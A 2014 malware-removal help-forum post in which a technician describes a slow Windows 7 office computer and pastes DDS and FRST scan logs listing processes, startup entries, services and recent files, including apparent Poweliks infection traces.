
Trojan.Poweliks, multiple dllhost.exe, vsiouxphi.exe, *32 processes,


This topic is locked
3 replies to this topic

#1 Calvin2316

  • Members
  • 1 posts
  • Gender:Male
  • Location:New York

Posted 04 November 2014 - 02:46 PM

My client’s Windows 7 computer started to run sluggishly.  
 
I ran Stinger as well as client’s Norton.
 
Windows Task Manager reveals many copies of:
 
dllhost.exe
conhost.exe  (Console Windows Host)
vsiouxphi.exe (Google Chrome)
 
and many svchost.exe *32 processes running.
 
Scans run by Norton showed no infection.
 
Any help appreciated.
 
I ran DDS and FRST; the logs are enclosed.
 
Many thanks,
Calvin
------------------------------------------------------
DDS (Ver_2012-11-20.01) - NTFS_x86 
Internet Explorer: 11.0.9600.17344  BrowserJavaVersion: 1.6.0_26
Run by Server at 14:11:59 on 2014-11-04
Microsoft Windows 7 Professional   6.1.7601.1.1252.1.1033.18.2013.597 [GMT -5:00]
.
AV: Norton Internet Security *Enabled/Updated* {D87FA2C0-F526-77B1-D6EC-0EDF3936CEDB}
SP: Norton Internet Security *Enabled/Updated* {631E4324-D31C-783F-EC5C-35AD42B18466}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
FW: Norton Internet Security *Enabled* {E04423E5-BF49-76E9-FDB3-A7EAC7E589A0}
.
============== Running Processes ================
.
C:\Windows\system32\wininit.exe
C:\Windows\system32\lsm.exe
C:\Windows\System32\spoolsv.exe
C:\Program Files\Common Files\Adobe\ARM\1.0\armsvc.exe
C:\Program Files\Realtek\Audio\HDA\AERTSrv.exe
C:\Program Files\Broadcom\BPowMon\BPowMon.exe
C:\Program Files\Century\TinyTERM\CenLPD.exe
C:\Program Files\iTivity\bin\connector_rc.exe
C:\Program Files\iTivity\bin\connector_rc.exe
C:\Program Files\iTivity\bin\processor_rc.exe
C:\Program Files\LogMeIn\x86\LMIGuardianSvc.exe
C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\mdm.exe
C:\Program Files\Medical Manager Corporation\AppServer\mmservice.exe
C:\Program Files\Norton Internet Security\Engine\21.6.0.32\NIS.exe
C:\PostgresPlus\8.3\bin\pg_ctl.exe
C:\Program Files\rmss\WIN_MONITOR.exe
C:\Program Files\Seagate\Seagate Dashboard 2.0\Seagate.Dashboard.DASWindowsService.exe
C:\Program Files\rmss\winprocmessage.exe
C:\Windows\system32\conhost.exe
C:\Program Files\rmss\win_server.exe
C:\Windows\system32\conhost.exe
C:\PostgresPlus\8.3\bin\postgres.exe
C:\Windows\system32\conhost.exe
C:\PostgresPlus\8.3\bin\postgres.exe
C:\PostgresPlus\8.3\bin\postgres.exe
C:\PostgresPlus\8.3\bin\postgres.exe
C:\PostgresPlus\8.3\bin\postgres.exe
C:\PostgresPlus\8.3\bin\postgres.exe
C:\Windows\system32\taskhost.exe
C:\Windows\system32\Dwm.exe
C:\Windows\Explorer.EXE
C:\Windows\system32\taskeng.exe
C:\Users\Server\AppData\Local\Amazon Cloud Player\Amazon Music Helper.exe
C:\Program Files\Seagate\Seagate Dashboard 2.0\MobileService.exe
C:\Program Files\Microsoft\BingBar\SeaPort.EXE
C:\Program Files\iTivity\bin\rfbd.exe
C:\MED\JDF\service\Wrapper.exe
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSvcM.exe
C:\Program Files\Norton Internet Security\Engine\21.6.0.32\NIS.exe
C:\Program Files\Common Files\Java\Java Update\jusched.exe
C:\Windows\System32\hkcmd.exe
C:\Windows\System32\igfxpers.exe
C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe
C:\Program Files\Adobe\Acrobat 10.0\Acrobat\acrotray.exe
C:\Windows\system32\java.exe
C:\Windows\system32\conhost.exe
C:\Windows\system32\PrintIsolationHost.exe
C:\Program Files\ZocDoc\ZocDoc Alerter\Alerter.exe
C:\Program Files\Seagate\Seagate Dashboard 2.0\DBAgent.exe
C:\Program Files\HP\HP Software Update\hpwuschd2.exe
C:\Program Files\Seagate\Seagate Dashboard 2.0\Seagate.Dashboard.Uploader.exe
C:\Windows\System32\regsvr32.exe
C:\Program Files\Jones Medical\SmartPrint APC\SmartPrintAPC.exe
C:\Windows\system32\wbem\wmiprvse.exe
C:\Program Files\Seagate\Seagate Dashboard 2.0\DeviceAgent.exe
C:\Windows\system32\SearchIndexer.exe
C:\Program Files\Windows Media Player\wmpnetwk.exe
C:\Windows\system32\dllhost.exe
C:\Windows\system32\ctfmon.exe
C:\Windows\system32\dllhost.exe
C:\Windows\system32\taskmgr.exe
C:\Program Files\Adobe\Adobe Captivate Quiz Results Analyzer\Adobe Captivate Quiz Results Analyzer.exe
C:\Windows\system32\dllhost.exe
C:\Users\Server\Desktop\FRST.exe
C:\Windows\explorer.exe
C:\Windows\System32\WUDFHost.exe
C:\Users\Server\AppData\LocalLow\qqxwnru\Udoeomhi\Vsiouxphi.exe
C:\Windows\system32\conhost.exe
C:\Users\Server\AppData\LocalLow\qqxwnru\Udoeomhi\Vsiouxphi.exe
C:\Users\Server\AppData\LocalLow\qqxwnru\Udoeomhi\Vsiouxphi.exe
C:\Windows\system32\DllHost.exe
C:\Users\Server\AppData\LocalLow\qqxwnru\Udoeomhi\Vsiouxphi.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k RPCSS
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\svchost.exe -k NetworkService
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
C:\Windows\System32\svchost.exe -k HPZ12
C:\Windows\System32\svchost.exe -k HPZ12
C:\Windows\system32\svchost.exe -k imgsvc
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
.
============== Pseudo HJT Report ===============
.
BHO: TmIEPlugInBHO Class: {1CA1377B-DC1D-4A52-9585-6E06050FAC53} - 
BHO: Norton Identity Protection: {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} - c:\program files\norton internet security\engine\21.6.0.32\coieplg.dll
BHO: Norton Vulnerability Protection: {6D53EC84-6AAE-4787-AEEE-F4628F01010C} - c:\program files\norton internet security\engine\21.6.0.32\ips\ipsbho.dll
BHO: Windows Live ID Sign-in Helper: {9030D464-4C02-4ABF-8ECC-5164760863C6} - c:\program files\common files\microsoft shared\windows live\WindowsLiveLogin.dll
BHO: Adobe PDF Conversion Toolbar Helper: {AE7CD045-E861-484f-8273-0445EE161910} - c:\program files\common files\adobe\acrobat\activex\AcroIEFavClient.dll
BHO: Bing Bar Helper: {d2ce3e00-f94a-4740-988e-03dc2f38c34f} - 
BHO: Java™ Plug-In 2 SSV Helper: {DBC80044-A445-435b-BC74-9C25C1C588A9} - c:\program files\java\jre6\bin\jp2ssv.dll
BHO: SmartSelect Class: {F4971EE7-DAA0-4053-9964-665D8EE6A077} - c:\program files\common files\adobe\acrobat\activex\AcroIEFavClient.dll
TB: Adobe PDF: {47833539-D0C5-4125-9FA8-0819E2EAAC93} - c:\program files\common files\adobe\acrobat\activex\AcroIEFavClient.dll
TB: Adobe PDF: {47833539-D0C5-4125-9FA8-0819E2EAAC93} - c:\program files\common files\adobe\acrobat\activex\AcroIEFavClient.dll
TB: Bing Bar: {8dcb7100-df86-4384-8842-8fa844297b3f} - 
TB: Norton Toolbar: {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - c:\program files\norton internet security\engine\21.6.0.32\coieplg.dll
uRun: [Uploader] c:\program files\seagate\seagate dashboard 2.0\Seagate.Dashboard.Uploader.exe
uRun: [dmzsfmczo] regsvr32.exe /s "c:\users\server\appdata\local\{29e5c0cd-57b9-4f77-9ac8-3d2490b42522}\dmzsfmczo.dll"
mRun: [SwitchBoard] c:\program files\common files\adobe\switchboard\SwitchBoard.exe
mRun: [WinVNC] "c:\program files\itivity\bin\rfbd.exe" -servicehelper
mRun: [SunJavaUpdateSched] "c:\program files\common files\java\java update\jusched.exe"
mRun: [IgfxTray] c:\windows\system32\igfxtray.exe
mRun: [HotKeysCmds] c:\windows\system32\hkcmd.exe
mRun: [Persistence] c:\windows\system32\igfxpers.exe
mRun: [Adobe ARM] "c:\program files\common files\adobe\arm\1.0\AdobeARM.exe"
mRun: [Adobe Acrobat Speed Launcher] "c:\program files\adobe\acrobat 10.0\acrobat\Acrobat_sl.exe"
mRun: [Acrobat Assistant 8.0] "c:\program files\adobe\acrobat 10.0\acrobat\Acrotray.exe"
mRun: [XeroxEndeavorBackgroundTask] rundll32.exe xrWCbgnd.dll,LaunchBgTask 1
mRun: [ZocDoc Alerter] c:\program files\zocdoc\zocdoc alerter\launcher.bat
mRun: [DBAgent] "c:\program files\seagate\seagate dashboard 2.0\DBAgent.exe" /WinStart
mRun: [HP Software Update] c:\program files\hp\hp software update\HPWuSchd2.exe
StartupFolder: c:\progra~2\micros~1\windows\startm~1\programs\startup\smartp~1.lnk - c:\program files\jones medical\smartprint apc\SmartPrintAPC.exe
uPolicies-Explorer: NoDriveTypeAutoRun = dword:145
mPolicies-System: ConsentPromptBehaviorAdmin = dword:0
mPolicies-System: ConsentPromptBehaviorUser = dword:3
mPolicies-System: EnableLUA = dword:0
mPolicies-System: EnableUIADesktopToggle = dword:0
mPolicies-System: PromptOnSecureDesktop = dword:0
IE: Append Link Target to Existing PDF - c:\program files\common files\adobe\acrobat\activex\AcroIEFavClient.dll/AcroIEAppendSelLinks.html
IE: Append to Existing PDF - c:\program files\common files\adobe\acrobat\activex\AcroIEFavClient.dll/AcroIEAppend.html
IE: Convert Link Target to Adobe PDF - c:\program files\common files\adobe\acrobat\activex\AcroIEFavClient.dll/AcroIECaptureSelLinks.html
IE: Convert to Adobe PDF - c:\program files\common files\adobe\acrobat\activex\AcroIEFavClient.dll/AcroIECapture.html
IE: E&xport to Microsoft Excel - c:\progra~1\micros~3\office12\EXCEL.EXE/3000
IE: {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - {5F7B1267-94A9-47F5-98DB-E99415F33AEC} - c:\program files\windows live\writer\WriterBrowserExtension.dll
IE: {22CC3EBD-C286-43aa-B8E6-06B115F74162} - c:\program files\hewlett-packard\smartprint\smartprintsetup.exe
IE: {92780B25-18CC-41C8-B9BE-3C9C571A8263} - {FF059E31-CC5A-4E2E-BF3B-96E929D65503}
TCP: Interfaces\{0F9DC998-7064-4B0B-BDF8-404185767936} : NameServer = 192.168.1.1
Handler: tmpx - {0E526CB5-7446-41D1-A403-19BFE95E8C23} - 
Handler: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - c:\program files\windows live\photo gallery\AlbumDownloadProtocolHandler.dll
Notify: igfxcui - igfxdev.dll
SSODL: WebCheck - <orphaned>
Hosts: 65.124.231.35 envoylinkbatch.webmd.com
Hosts: 198.31.9.13 wit.envoy.com
Hosts: 170.138.220.213 itsbatch.emdeon.com
Hosts: 170.138.220.169 its.emdeon.com
Hosts: 64.88.171.98 sts.sagehealth.com
.
Note: multiple HOSTS entries found. Please refer to Attach.txt
.
================= FIREFOX ===================
.
FF - ProfilePath - c:\users\server\appdata\roaming\mozilla\firefox\profiles\6arooxwm.default\
FF - prefs.js: browser.startup.homepage - about:home
FF - component: c:\program files\adobe\acrobat 10.0\acrobat\browser\wcfirefoxextn\components\WCFirefox3Extn.dll
FF - component: c:\program files\hewlett-packard\smartprint\qpextension\components\FFQpBHO3.5.dll
FF - component: c:\program files\hewlett-packard\smartprint\qpextension\components\FFQpBHO3.6.dll
FF - component: c:\program files\hewlett-packard\smartprint\qpextension\components\hpWebPrinting35.dll
FF - component: c:\program files\hewlett-packard\smartprint\qpextension\components\hpWebPrinting36.dll
FF - component: c:\programdata\norton\{0c55c096-0f1d-4f28-aaa2-85ef591126e7}\nis_21.1.0.18\ipsff\components\IPSFF3.dll
FF - plugin: c:\program files\adobe\acrobat 10.0\acrobat\air\nppdf32.dll
FF - plugin: c:\program files\adobe\reader 10.0\reader\air\nppdf32.dll
FF - plugin: c:\program files\amazon\mp3 downloader\npAmazonMP3DownloaderPlugin101721.dll
FF - plugin: c:\program files\java\jre6\bin\new_plugin\npdeployJava1.dll
FF - plugin: c:\program files\microsoft silverlight\5.1.30514.0\npctrlui.dll
FF - plugin: c:\program files\windows live\photo gallery\NPWLPG.dll
FF - plugin: c:\programdata\visan\plugins\npRLSecurePluginLayer.dll
.
---- FIREFOX POLICIES ----
FF - user.js: general.useragent.extra.brc - BRI/1
.
============= SERVICES / DRIVERS ===============
.
R0 SymDS;Symantec Data Store;c:\windows\system32\drivers\nis\1506000.020\symds.sys [2014-10-2 367704]
R0 SymEFA;Symantec Extended File Attributes;c:\windows\system32\drivers\nis\1506000.020\symefa.sys [2014-10-2 936152]
R1 BHDrvx86;BHDrvx86;c:\program files\norton internet security\nortondata\21.1.0.18\definitions\bashdefs\20141030.001\BHDrvx86.sys [2014-11-3 1138392]
R1 ccSet_NIS;NIS Settings Manager;c:\windows\system32\drivers\nis\1506000.020\ccsetx86.sys [2014-10-2 127064]
R1 IDSVix86;IDSVix86;c:\program files\norton internet security\nortondata\21.1.0.18\definitions\ipsdefs\20141103.001\IDSvix86.sys [2014-11-3 476888]
R1 SymIRON;Symantec Iron Driver;c:\windows\system32\drivers\nis\1506000.020\ironx86.sys [2014-10-2 209624]
R1 SymNetS;Symantec Network Security WFP Driver;c:\windows\system32\drivers\nis\1506000.020\symnets.sys [2014-10-2 447704]
R2 AERTFilters;Andrea RT Filters Service;c:\program files\realtek\audio\hda\AERTSrv.exe [2010-12-17 81920]
R2 BPowMon;Broadcom Power monitoring service;c:\program files\broadcom\bpowmon\BPowMon.exe [2009-8-17 79168]
R2 CenLPD;Century LPD;c:\program files\century\tinyterm\CenLPD.exe [2009-3-18 107976]
R2 CenNFS;Century Software, Inc. Century NFS Client for NT;c:\windows\system32\drivers\cennfs.sys [2011-2-18 138528]
R2 iTivityRCConnector;iTivity Unattended iAgent Connector Direct;c:\program files\itivity\bin\connector_rc.exe [2011-3-28 511771]
R2 iTivityRCConnectToIASConnector;iTivity Unattended iAgent Connector To IAS;c:\program files\itivity\bin\connector_rc.exe [2011-3-28 511771]
R2 iTivityRCController;iTivity Unattended iAgent Controller;c:\program files\itivity\bin\processor_rc.exe [2011-3-28 552159]
R2 LMIGuardianSvc;LMIGuardianSvc;c:\program files\logmein\x86\LMIGuardianSvc.exe [2010-12-8 374152]
R2 LMIInfo;LogMeIn Kernel Information Provider;c:\program files\logmein\x86\rainfo.sys [2010-9-17 12856]
R2 LMIRfsDriver;LogMeIn Remote File System Driver;c:\windows\system32\drivers\LMIRfsDriver.sys [2011-2-1 47640]
R2 MMWin AppServer;MMWin AppServer;c:\program files\medical manager corporation\appserver\mmservice.exe [2011-2-1 110592]
R2 NIS;Norton Internet Security;c:\program files\norton internet security\engine\21.6.0.32\nis.exe [2014-10-2 276376]
R2 pg-plus-8.3;Postgres Plus 8.3 - Server;c:\postgresplus\8.3\bin\pg_ctl.exe runservice -w -n "pg-plus-8.3" -d "c:\postgresplus\8.3\data\" --> c:\postgresplus\8.3\bin\pg_ctl.exe runservice -w -N pg-plus-8.3 [?]
R2 Remote Monitoring;Remote Monitoring;c:\program files\rmss\win_monitor.exe [2011-3-28 94337]
R2 Seagate Dashboard Services;Seagate Dashboard Services;c:\program files\seagate\seagate dashboard 2.0\Seagate.Dashboard.DASWindowsService.exe [2014-2-10 16000]
R2 Seagate MobileBackup Service;Seagate MobileBackup Service;c:\program files\seagate\seagate dashboard 2.0\MobileService.exe [2014-2-10 157264]
R2 tridiavnc;Tridia Screen Server;c:\program files\itivity\bin\rfbd.exe [2011-3-28 473600]
R2 ultia;Ultia Server;c:\med\jdf\service\wrapper.exe -s c:\med\jdf\service\wrapper.conf --> c:\med\jdf\service\wrapper.exe -s c:\med\jdf\service\wrapper.conf [?]
R3 EraserUtilRebootDrv;EraserUtilRebootDrv;c:\program files\common files\symantec shared\eengine\EraserUtilRebootDrv.sys [2014-9-10 111408]
R3 NmPar;PCI Parallel Port;c:\windows\system32\drivers\NmPar.sys [2010-1-12 81920]
S2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86;c:\windows\microsoft.net\framework\v4.0.30319\mscorsvw.exe [2013-9-11 105144]
S2 rb_meddata_34083;Data Broker for c:\med\meddata;c:\med\medprogs\rbroker.exe [2011-3-29 645632]
S2 um_meddata_34083;Update Manager for c:\med\meddata;c:\python25\lib\site-packages\win32\pythonservice.exe [2009-7-5 8704]
S3 b57nd60x;Broadcom NetXtreme Gigabit Ethernet - NDIS 6.0;c:\windows\system32\drivers\b57nd60x.sys [2009-7-13 229888]
S3 BBSvc;Bing Bar Update Service;c:\program files\microsoft\bingbar\BBSvc.EXE [2011-2-28 183560]
S3 IEEtwCollectorService;Internet Explorer ETW Collector Service;c:\windows\system32\ieetwcollector.exe [2014-10-16 108032]
S3 k57nd60x;Broadcom NetLink ™ Gigabit Ethernet - NDIS 6.0;c:\windows\system32\drivers\k57nd60x.sys [2010-12-17 273960]
S3 pg-plus-8.3-replication;Postgres Plus 8.3 - Replication;c:\postgresplus\8.3\bin\slon.exe -service --> c:\postgresplus\8.3\bin\slon.exe -service [?]
S3 pg-plus-8.3-scheduler;Postgres Plus 8.3 - Scheduler;c:\postgresplus\8.3\bin\pgagent.exe run "pg-plus-8.3-scheduler" hostaddr=127.0.0.1 dbname=postgres user=postgres --> c:\postgresplus\8.3\bin\pgAgent.exe RUN pg-plus-8.3-scheduler [?]
S3 StorSvc;Storage Service;c:\windows\system32\svchost.exe -k LocalSystemNetworkRestricted [2009-7-13 20992]
S3 SwitchBoard;Adobe SwitchBoard;c:\program files\common files\adobe\switchboard\SwitchBoard.exe [2010-2-19 517096]
S3 TridiaFTPServer;TridiaFTP Server;c:\program files\itivity\bin\ftpd.exe [2011-3-28 536640]
S3 TsUsbFlt;TsUsbFlt;c:\windows\system32\drivers\TsUsbFlt.sys [2011-3-4 52224]
S3 UsbGps;LGE CDMA USB GPS NMEA Port;c:\windows\system32\drivers\lgusbgps.sys [2014-3-28 19968]
S3 WatAdminSvc;Windows Activation Technologies Service;c:\windows\system32\wat\WatAdminSvc.exe [2011-2-1 1343400]
S3 WSDScan;WSD Scan Support via UMB;c:\windows\system32\drivers\WSDScan.sys [2009-7-13 20480]
.
=============== Created Last 30 ================
.
2014-11-04 18:39:41 -------- d-----w- C:\FRST
2014-10-31 20:28:57 -------- d-----w- c:\users\server\appdata\local\Seagate_Technology_LLC
2014-10-31 14:35:35 -------- d-----w- c:\program files\stinger
2014-10-31 14:01:47 0 ----a-w- c:\windows\system32\cnsvbuk.dll
2014-10-31 14:00:02 40960 ----a-w- c:\windows\system32\jvnnbbh.dll
2014-10-31 13:59:54 31232 ----a-w- c:\windows\system32\jxesd.dll
2014-10-30 17:20:08 -------- d-----w- c:\users\server\appdata\local\Programs
2014-10-30 17:19:10 -------- d-----w- c:\users\server\appdata\roaming\Roxio Log Files
2014-10-16 06:30:51 2363904 ----a-w- c:\windows\system32\msi.dll
2014-10-07 15:59:29 552224 ----a-w- c:\windows\system32\spool\prtprocs\w32x86\hpcpp170.dll
2014-10-07 15:58:30 167480 ----a-w- c:\windows\system32\hppccompio.dll
2014-10-07 15:58:30 134944 ----a-w- c:\windows\system32\hpmtp170.dll
2014-10-07 15:58:29 62752 ----a-w- c:\windows\system32\hpmpw081.dll
2014-10-07 15:58:29 55688 ----a-w- c:\windows\system32\hpmnque.dll
2014-10-07 15:58:29 55688 ----a-w- c:\windows\system32\hpmnndps.dll
2014-10-07 15:58:29 196896 ----a-w- c:\windows\system32\hpmml170.dll
2014-10-07 15:58:29 171296 ----a-w- c:\windows\system32\hpmja170.dll
2014-10-07 15:58:29 157984 ----a-w- c:\windows\system32\hpmpm081.dll
2014-10-07 15:58:29 103200 ----a-w- c:\windows\system32\hpmlm135.dll
2014-10-07 15:58:24 421664 ----a-w- c:\windows\system32\hpcpn170.dll
2014-10-07 15:58:23 119584 ----a-w- c:\windows\system32\hpcjpm.dll
2014-10-07 15:58:18 59928 ----a-w- c:\windows\system32\fxcompchannel.dll
2014-10-07 15:41:23 -------- d-----w- C:\HP Universal Print Driver
2014-10-07 15:27:17 20080 ----a-w- c:\program files\mozilla firefox\AccessibleMarshal.dll
2014-10-07 15:27:16 74864 ----a-w- c:\program files\mozilla firefox\breakpadinjector.dll
2014-10-07 15:27:16 2106216 ----a-w- c:\program files\mozilla firefox\D3DCompiler_43.dll
2014-10-07 15:27:15 47216 ----a-w- c:\program files\mozilla firefox\browser\components\browsercomps.dll
2014-10-07 15:27:08 3231696 ----a-w- c:\program files\mozilla firefox\d3dcompiler_46.dll
2014-10-07 15:27:06 800368 ----a-w- c:\program files\mozilla firefox\icuuc52.dll
2014-10-07 15:27:06 10397296 ----a-w- c:\program files\mozilla firefox\icudt52.dll
2014-10-07 15:27:06 1023600 ----a-w- c:\program files\mozilla firefox\icuin52.dll
2014-10-07 15:27:00 93808 ----a-w- c:\program files\mozilla firefox\webapprt-stub.exe
2014-10-07 15:27:00 25047152 ----a-w- c:\program files\mozilla firefox\xul.dll
.
==================== Find3M  ====================
.
2014-10-10 01:44:58 230912 ----a-w- c:\windows\system32\generaltel.dll
2014-10-10 01:44:35 396288 ----a-w- c:\windows\system32\aepdu.dll
2014-10-10 01:39:38 302592 ----a-w- c:\windows\system32\aeinv.dll
2014-09-29 00:41:36 2379264 ----a-w- c:\windows\system32\win32k.sys
2014-09-25 22:32:04 2017280 ----a-w- c:\windows\system32\inetcpl.cpl
2014-09-25 14:26:48 71344 ----a-w- c:\windows\system32\FlashPlayerCPLApp.cpl
2014-09-25 14:26:48 701104 ----a-w- c:\windows\system32\FlashPlayerApp.exe
2014-09-25 01:40:50 519680 ----a-w- c:\windows\system32\qdvd.dll
2014-09-19 01:25:12 4201472 ----a-w- c:\windows\system32\jscript9.dll
2014-09-19 01:14:57 2724864 ----a-w- c:\windows\system32\mshtml.tlb
2014-09-19 01:14:44 4096 ----a-w- c:\windows\system32\ieetwcollectorres.dll
2014-09-19 01:02:07 454656 ----a-w- c:\windows\system32\vbscript.dll
2014-09-19 01:01:47 61952 ----a-w- c:\windows\system32\iesetup.dll
2014-09-19 01:01:03 51200 ----a-w- c:\windows\system32\ieetwproxystub.dll
2014-09-19 00:59:40 61952 ----a-w- c:\windows\system32\MshtmlDac.dll
2014-09-19 00:50:16 112128 ----a-w- c:\windows\system32\ieUnatt.exe
2014-09-19 00:50:15 108032 ----a-w- c:\windows\system32\ieetwcollector.exe
2014-09-19 00:49:31 597504 ----a-w- c:\windows\system32\jscript9diag.dll
2014-09-19 00:44:23 646144 ----a-w- c:\windows\system32\MsSpellCheckingFacility.exe
2014-09-19 00:36:23 60416 ----a-w- c:\windows\system32\JavaScriptCollectionAgent.dll
2014-09-19 00:18:55 1068032 ----a-w- c:\windows\system32\mshtmlmedia.dll
2014-09-18 23:59:11 1810944 ----a-w- c:\windows\system32\wininet.dll
2014-09-13 01:40:05 67072 ----a-w- c:\windows\system32\packager.dll
2014-09-09 21:47:10 2048 ----a-w- c:\windows\system32\tzres.dll
2014-09-04 05:04:15 372736 ----a-w- c:\windows\system32\rastls.dll
2014-08-26 02:20:22 664792 ----a-w- c:\windows\system32\drivers\nis\1506000.020\srtsp.sys
2014-08-26 02:20:22 32984 ----a-w- c:\windows\system32\drivers\nis\1506000.020\srtspx.sys
2014-08-23 01:46:55 305152 ----a-w- c:\windows\system32\gdi32.dll
2014-08-06 19:48:16 209624 ----a-w- c:\windows\system32\drivers\nis\1506000.020\ironx86.sys
.
============= FINISH: 14:14:36.93 ===============

Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 04-11-2014
Ran by Server (administrator) on MMSERV on 04-11-2014 13:44:07
Running from C:\Users\Server\Desktop
Loaded Profiles: Server & LogMeInRemoteUser & Dr. Shapiro & medadmin & postgres & medical (Available profiles: Server & LogMeInRemoteUser & Dr. Shapiro & medadmin & postgres & medical)
Platform: Microsoft Windows 7 Professional  Service Pack 1 (X86) OS Language: English (United States)
Internet Explorer Version 11
Boot Mode: Normal
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(Andrea Electronics Corporation) C:\Program Files\Realtek\Audio\HDA\AERTSrv.exe
(Broadcom Corp.) C:\Program Files\Broadcom\BPowMon\BPowMon.exe
() C:\Program Files\Century\TinyTERM\CenLPD.exe
(Tridia Corporation) C:\Program Files\iTivity\bin\connector_rc.exe
(Tridia Corporation) C:\Program Files\iTivity\bin\connector_rc.exe
(Tridia Corporation) C:\Program Files\iTivity\bin\processor_rc.exe
(LogMeIn, Inc.) C:\Program Files\LogMeIn\x86\LMIGuardianSvc.exe
(Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\VS7DEBUG\mdm.exe
() C:\Program Files\Medical Manager Corporation\AppServer\mmservice.exe
(Symantec Corporation) C:\Program Files\Norton Internet Security\Engine\21.6.0.32\nis.exe
(PostgreSQL Global Development Group) C:\PostgresPlus\8.3\bin\pg_ctl.exe
() C:\Program Files\rmss\win_monitor.exe
(Seagate Technology LLC) C:\Program Files\Seagate\Seagate Dashboard 2.0\Seagate.Dashboard.DASWindowsService.exe
() C:\Program Files\rmss\winprocmessage.exe
() C:\Program Files\rmss\win_server.exe
(PostgreSQL Global Development Group) C:\PostgresPlus\8.3\bin\postgres.exe
(PostgreSQL Global Development Group) C:\PostgresPlus\8.3\bin\postgres.exe
(PostgreSQL Global Development Group) C:\PostgresPlus\8.3\bin\postgres.exe
(PostgreSQL Global Development Group) C:\PostgresPlus\8.3\bin\postgres.exe
(PostgreSQL Global Development Group) C:\PostgresPlus\8.3\bin\postgres.exe
(PostgreSQL Global Development Group) C:\PostgresPlus\8.3\bin\postgres.exe
() C:\Users\Server\AppData\Local\Amazon Cloud Player\Amazon Music Helper.exe
(Seagate Technology LLC) C:\Program Files\Seagate\Seagate Dashboard 2.0\MobileService.exe
(Microsoft Corporation) C:\Program Files\Microsoft\BingBar\SeaPort.EXE
(Tridia Corporation) C:\Program Files\iTivity\bin\rfbd.exe
() C:\MED\JDF\service\Wrapper.exe
(Microsoft Corp.) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVC.EXE
(Microsoft Corp.) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVCM.EXE
(Symantec Corporation) C:\Program Files\Norton Internet Security\Engine\21.6.0.32\nis.exe
(Sun Microsystems, Inc.) C:\Program Files\Common Files\Java\Java Update\jusched.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Adobe Systems Incorporated) C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe
(Adobe Systems Inc.) C:\Program Files\Adobe\Acrobat 10.0\Acrobat\acrotray.exe
(Sun Microsystems, Inc.) C:\Windows\System32\java.exe
(Microsoft Corporation) C:\Windows\System32\PrintIsolationHost.exe
(ZocDoc) C:\Program Files\ZocDoc\ZocDoc Alerter\Alerter.exe
(Seagate Technology LLC) C:\Program Files\Seagate\Seagate Dashboard 2.0\DBAgent.exe
(Hewlett-Packard) C:\Program Files\HP\HP Software Update\hpwuschd2.exe
(Seagate Technology LLC) C:\Program Files\Seagate\Seagate Dashboard 2.0\Seagate.Dashboard.Uploader.exe
(Microsoft Corporation) C:\Windows\System32\regsvr32.exe
(Jones Medical) C:\Program Files\Jones Medical\SmartPrint APC\SmartPrintAPC.exe
(Seagate Technology LLC) C:\Program Files\Seagate\Seagate Dashboard 2.0\DeviceAgent.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\taskmgr.exe
() C:\Program Files\Adobe\Adobe Captivate Quiz Results Analyzer\Adobe Captivate Quiz Results Analyzer.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Seagate Technology LLC) C:\Program Files\Seagate\Seagate Dashboard 2.0\NBCore.exe
(Google Inc.) C:\Users\Server\AppData\LocalLow\qqxwnru\Udoeomhi\Vsiouxphi.exe
(Google Inc.) C:\Users\Server\AppData\LocalLow\qqxwnru\Udoeomhi\Vsiouxphi.exe
(Google Inc.) C:\Users\Server\AppData\LocalLow\qqxwnru\Udoeomhi\Vsiouxphi.exe
(Hewlett-Packard Co.) C:\Program Files\HP\HP Deskjet 3050 J610 series\Bin\HPCustPartic.exe
 
 
==================== Registry (Whitelisted) ==================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [SwitchBoard] => C:\Program Files\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated)
HKLM\...\Run: [WinVNC] => C:\Program Files\iTivity\bin\rfbd.exe [473600 2010-07-28] (Tridia Corporation)
HKLM\...\Run: [SunJavaUpdateSched] => C:\Program Files\Common Files\Java\Java Update\jusched.exe [254696 2011-04-08] (Sun Microsystems, Inc.)
HKLM\...\Run: [Adobe ARM] => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959176 2014-08-21] (Adobe Systems Incorporated)
HKLM\...\Run: [Adobe Acrobat Speed Launcher] => C:\Program Files\Adobe\Acrobat 10.0\Acrobat\Acrobat_sl.exe [39136 2012-12-18] (Adobe Systems Incorporated)
